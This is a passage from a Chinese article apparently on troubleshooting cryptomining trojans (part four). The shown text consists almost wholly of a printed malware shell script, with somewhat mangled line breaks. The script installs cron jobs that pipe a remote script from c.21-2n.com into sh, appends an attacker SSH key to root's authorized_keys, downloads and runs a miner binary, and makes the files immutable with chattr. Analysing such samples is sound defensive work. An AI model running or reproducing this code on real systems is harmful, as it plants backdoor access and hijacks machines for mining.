如何排查常见挖矿木马( 四 )


  chattr -i $cont
  if [ -f "$bbdir" ]   then
    [[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
   else
    [[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
  fi
  mkdir /root/.ssh
  [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
  [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
  [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys
  [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys
  ps -fe|grep zigw |grep -v grep  if [ $? -ne 0 ]   then
    cd /etc
    filesize=`ls -l zigw | awk '{ print $5 }'`
    file="/etc/zigw"
    if [ -f "$file" ]     then
      if [ "$filesize" -ne "1467080" ]       then
        chattr -i /etc/zigw
        rm -f zigw        if [ -f "$bbdir" ]        then
         curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw        elif [ -f "$bbdira" ]        then
         url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw        elif [ -f "$ccdir" ]        then
         wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw        elif [ -f "$ccdira" ]        then
         get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw        fi
      fi
     else
      if [ -f "$bbdir" ]      then
       curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw      elif [ -f "$bbdira" ]      then
       url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw      elif [ -f "$ccdir" ]      then
       wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw      elif [ -f "$ccdira" ]      then
       get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw      fi
    fi
    chmod 777 zigw
    sleep 1s
    ./zigw   else
    echo "runing....."
  fi
  chmod 777 /etc/zigw
  chattr +i /etc/zigw
  chmod 777 /etc/shz.sh
  chattr +i /etc/shz.sh
  shdir='/etc/shz.sh'
  if [ -f "$shdir" ]   then
    echo "exists shell"
   else
    if [ -f "$bbdir" ]    then
     curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh    elif [ -f "$bbdira" ]    then
     url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh    elif [ -f "$ccdir" ]    then
     wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh    elif [ -f "$ccdira" ]    then
     get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh    fi

